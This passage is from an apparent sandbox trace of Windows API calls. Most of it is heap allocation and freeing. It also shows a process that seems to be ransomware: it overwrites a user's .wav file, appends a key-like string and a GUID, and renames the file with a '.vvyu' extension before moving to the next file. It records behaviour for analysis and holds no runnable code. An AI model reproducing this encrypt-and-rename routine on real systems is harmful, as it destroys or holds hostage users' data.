hHeap=0x2c0000) returned 1 [0197.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.674] GetCurrentThreadId () returned 0x5d8 [0197.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2a50 [0197.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0197.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.675] GetCurrentThreadId () returned 0x5d8 [0197.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6848 [0197.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67e8 [0197.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0197.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6800 [0197.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67d0 [0197.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6860 [0197.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0197.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6830 [0197.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6818 [0197.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6878 [0197.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6818 [0197.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0197.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0197.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67e8 [0197.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0197.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0197.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0197.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea890 | out: hHeap=0x2c0000) returned 1 [0197.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.687] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x11645, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x11645, lpOverlapped=0x0) returned 1 [0197.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.688] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1164a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.688] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.690] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.690] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.690] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.690] CloseHandle (hObject=0x584) returned 1 [0197.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0197.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0197.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0197.694] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\k8_cI3l6hV1-Y7\\27Qc0VUi07zkn_VUAary.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\k8_ci3l6hv1-y7\\27qc0vui07zkn_vuaary.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\k8_cI3l6hV1-Y7\\27Qc0VUi07zkn_VUAary.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\k8_ci3l6hv1-y7\\27qc0vui07zkn_vuaary.wav.vvyu")) returned 1 [0197.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.696] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0197.699] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79d838e0, ftCreationTime.dwHighDateTime=0x1d89f16, ftLastAccessTime.dwLowDateTime=0xc8169120, ftLastAccessTime.dwHighDateTime=0x1d89f28, ftLastWriteTime.dwLowDateTime=0xc8169120, ftLastWriteTime.dwHighDateTime=0x1d89f28, nFileSizeHigh=0x0, nFileSizeLow=0x1164a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="27Qc0VUi07zkn_VUAary.wav", cAlternateFileName="27QC0V~1.WAV")) returned 0 [0197.699] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0197.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0197.700] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0197.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0197.700] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0197.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0197.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) 